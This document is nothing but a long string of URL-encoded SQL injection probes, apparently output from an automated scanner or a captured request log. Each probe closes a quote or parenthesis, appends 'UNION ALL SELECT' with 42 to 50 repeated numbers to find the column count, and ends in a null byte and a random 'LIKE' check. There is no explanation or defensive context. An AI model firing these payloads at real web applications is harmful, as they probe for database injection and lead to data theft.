-8767%22%29%20UNION%20ALL%20SELECT%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%2C%203253%00%20AND%20%28%22MKPr%22%20LIKE%20%22MKPr -4967%22%29%20UNION%20ALL%20SELECT%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%2C%207839%00%20AND%20%28%22bNRo%22%20LIKE%20%22bNRo -3813%22%29%20UNION%20ALL%20SELECT%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%00%20AND%20%28%22oFUw%22%20LIKE%20%22oFUw -6565%22%29%20UNION%20ALL%20SELECT%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%2C%206768%00%20AND%20%28%22OjhW%22%20LIKE%20%22OjhW -5408%22%29%20UNION%20ALL%20SELECT%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%2C%209790%00%20AND%20%28%22gpZo%22%20LIKE%20%22gpZo -3140%22%29%20UNION%20ALL%20SELECT%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%2C%206451%00%20AND%20%28%22nAuS%22%20LIKE%20%22nAuS -5325%22%29%20UNION%20ALL%20SELECT%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%2C%204041%00%20AND%20%28%22xezG%22%20LIKE%20%22xezG -2389%22%29%20UNION%20ALL%20SELECT%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%2C%204771%00%20AND%20%28%22PFhE%22%20LIKE%20%22PFhE -3059%22%29%29%20UNION%20ALL%20SELECT%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%2C%203081%00%20AND%20%28%28%22JBWC%22%20LIKE%20%22JBWC -3478%22%29%29%20UNION%20ALL%20SELECT%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%2C%201968%00%20AND%20%28%28%22zslA%22%20LIKE%20%22zslA -5489%22%29%29%20UNION%20ALL%20SELECT%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%2C%201084%00%20AND%20%28%28%22YXXj%22%20LIKE%20%22YXXj -4480%22%29%29%20UNION%20ALL%20SELECT%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%2C%207675%00%20AND%20%28%28%22GTGb%22%20LIKE%20%22GTGb -9824%22%29%29%20UNION%20ALL%20SELECT%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%2C%202506%00%20AND%20%28%28%22HhdY%22%20LIKE%20%22HhdY -4825%22%29%29%20UNION%20ALL%20SELECT%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%2C%207336%00%20AND%20%28%28%22BUEo%22%20LIKE%20%22BUEo -7096%22%29%29%20UNION%20ALL%20SELECT%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%2C%205202%00%20AND%20%28%28%22FWHW%22%20LIKE%20%22FWHW -8753%22%29%29%20UNION%20ALL%20SELECT%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%00%20AND%20%28%28%22GBXh%22%20LIKE%20%22GBXh -7907%22%29%29%20UNION%20ALL%20SELECT%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%2C%203005%00%20AND%20%28%28%22rlGY%22%20LIKE%20%22rlGY -6383%22%29%29%20UNION%20ALL%20SELECT%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%2C%209013%00%20AND%20%28%28%22bXlX%22%20LIKE%20%22bXlX -5831%22%29%29%29%20UNION%20ALL%20SELECT%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%2C%205956%00%20AND%20%28%28%28%22CjvP%22%20LIKE%20%22CjvP -7704%22%29%29%29%20UNION%20ALL%20SELECT%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%2C%204965%00%20AND%20%28%28%28%22PebV%22%20LIKE%20%22PebV -4990%22%29%29%29%20UNION%20ALL%20SELECT%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%00%20AND%20%28%28%28%22UDKH%22%20LIKE%20%22UDKH -2604%22%29%29%29%20UNION%20ALL%20SELECT%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%2C%204933%00%20AND%20%28%28%28%22PETB%22%20LIKE%20%22PETB -6457%22%29%29%29%20UNION%20ALL%20SELECT%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%2C%203898%00%20AND%20%28%28%28%22jiHT%22%20LIKE%20%22jiHT -7212%22%29%29%29%20UNION%20ALL%20SELECT%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%2C%204494%00%20AND%20%28%28%28%22FLXi%22%20LIKE%20%22FLXi -7957%22%29%29%29%20UNION%20ALL%20SELECT%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%2C%206072%00%20AND%20%28%28%28%22RnBH%22%20LIKE%20%22RnBH -9847%22%29%29%29%20UNION%20ALL%20SELECT%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%2C%201555%00%20AND%20%28%28%28%22JMns%22%20LIKE%20%22JMns -1673%22%29%29%29%20UNION%20ALL%20SELECT%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%2C%205005%00%20AND%20%28%28%28%22iCkC%22%20LIKE%20%22iCkC -8592%22%29%29%29%20UNION%20ALL%20SELECT%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%2C%207000%00%20AND%20%28%28%28%22MHkn%22%20LIKE%20%22MHkn -7243%22%20UNION%20ALL%20SELECT%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%2C%204462%00%20AND%20%22DNWy%22%20LIKE%20%22DNWy -9908%22%20UNION%20ALL%20SELECT%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%2C%207334%00%20AND%20%22QRvs%22%20LIKE%20%22QRvs -8112%22%20UNION%20ALL%20SELECT%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%2C%208630%00%20AND%20%22CXFw%22%20LIKE%20%22CXFw -4871%22%20UNION%20ALL%20SELECT%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%00%20AND%20%22LoEW%22%20LIKE%20%22LoEW -3728%22%20UNION%20ALL%20SELECT%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%2C%203029%00%20AND%20%22movB%22%20LIKE%20%22movB -2221%22%20UNION%20ALL%20SELECT%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%2C%208180%00%20AND%20%22lRzI%22%20LIKE%20%22lRzI -2660%22%20UNION%20ALL%20SELECT%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%2C%201119%00%20AND%20%22IYPy%22%20LIKE%20%22IYPy -1282%22%20UNION%20ALL%20SELECT%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%2C%204961%00%20AND%20%22ReqI%22%20LIKE%20%22ReqI -2942%22%20UNION%20ALL%20SELECT%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%2C%209215%00%20AND%20%22SZqG%22%20LIKE%20%22SZqG -8598%22%20UNION%20ALL%20SELECT%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%00%20AND%20%22FtkF%22%20LIKE%20%22FtkF -5259%29%20WHERE%207670%3D7670%20UNION%20ALL%20SELECT%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%2C%207670%00 -4622%29%20WHERE%205894%3D5894%20UNION%20ALL%20SELECT%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%2C%205894%00 -8088%29%20WHERE%202304%3D2304%20UNION%20ALL%20SELECT%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%2C%202304%00 -2469%29%20WHERE%207134%3D7134%20UNION%20ALL%20SELECT%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%2C%207134%00 -8684%29%20WHERE%207067%3D7067%20UNION%20ALL%20SELECT%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%2C%207067%00 -4185%29%20WHERE%204231%3D4231%20UNION%20ALL%20SELECT%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%2C%204231%00 -1002%29%20WHERE%206091%3D6091%20UNION%20ALL%20SELECT%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%2C%206091%00 -7672%29%20WHERE%207525%3D7525%20UNION%20ALL%20SELECT%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%2C%207525%00 